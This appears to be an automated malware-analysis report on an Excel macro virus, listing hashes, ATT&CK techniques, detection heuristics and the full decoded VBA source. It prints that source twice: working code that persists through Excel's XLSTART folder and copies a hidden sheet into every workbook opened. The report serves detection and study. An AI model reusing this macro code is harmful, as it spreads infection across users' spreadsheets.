Xls.Dropper.Agent-6290906-0 Office (OLE) malware analysis — malicious · 58f084cdc061a439

MALICIOUS

Office (OLE)

31.0 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2014-10-17

MD5: b56de5f0d8cb48c4d616bf4dd2763142 SHA-1: dbf70d5b8ac23536be56e6872118e14d00bd47c9 SHA-256: 58f084cdc061a43986e303c43142b123bba7cffabcf112433c4b84771996f63e

208 Risk Score

Malware Insights

Xls.Dropper.Agent-6290906-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.005 Mark-of-the-Web Bypass

The sample is a malicious Excel document containing VBA macros. It leverages the Auto_Open macro to set up an OnSheetActivate hook, which is then used to copy the workbook into the Excel XLSTART startup folder as 'VERA.XLS', establishing persistence. The ClamAV detection name 'Xls.Dropper.Agent-6290906-0' suggests its function as a dropper.

Heuristics 6

ClamAV: Xls.Dropper.Agent-6290906-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-6290906-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set x = CreateObject("ADODB.Connection")
```
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
    ChDir Application.StartupPath
```
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER

The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
Matched line in script
```
    Application.OnSheetActivate = "check_files"
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2646 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2646 bytes
SHA-256: `9ee0a0a4205a3e31125e335775e5e2d5ee04ef8e6da98200a0341e2c78d163de`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Locas" Sub fig() Set x = CreateObject("ADODB.Connection") x.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by mid(款号,1,2)" Set yy = x.Execute(Sql) [g10:h44].Clear [g10].CopyFromRecordset yy Set yy = Nothing: Set x = Nothing End Sub Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" Application.OnSheetActivate = "check_files" End Sub Sub check_files() Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14" c$ = Application.StartupPath m$ = Dir(c$ & "\" & "VERA.XLS") If m$ = "VERA.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name Sheets("locas").Visible = True Sheets("locas").Select Sheets("locas").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.Name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("LOCAS").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "VERA.xls!check_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).Name If s$ <> "LOCAS" Then Workbooks("VERA.XLS").Sheets("LOCAS").Copy before:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("LOCAS").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = Tru Application.OnSheetActivate = "VERA.xls!check_files" Case Else End Select End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 9ee0a0a4205a3e31125e335775e5e2d5ee04ef8e6da98200a0341e2c78d163de

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Locas"



Sub fig()
    
    Set x = CreateObject("ADODB.Connection")
    
    x.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName
Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by  mid(款号,1,2)"

    Set yy = x.Execute(Sql)
   [g10:h44].Clear
   [g10].CopyFromRecordset yy
   
        Set yy = Nothing:    Set x = Nothing
End Sub





















Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "VERA.XLS")
    If m$ = "VERA.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("locas").Visible = True
    Sheets("locas").Select
    Sheets("locas").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("LOCAS").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "LOCAS" Then
         Workbooks("VERA.XLS").Sheets("LOCAS").Copy before:=Workbooks(n4$).Sheets(1)
    Workbooks(n4$).Sheets("LOCAS").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = Tru
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case Else
End Select
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.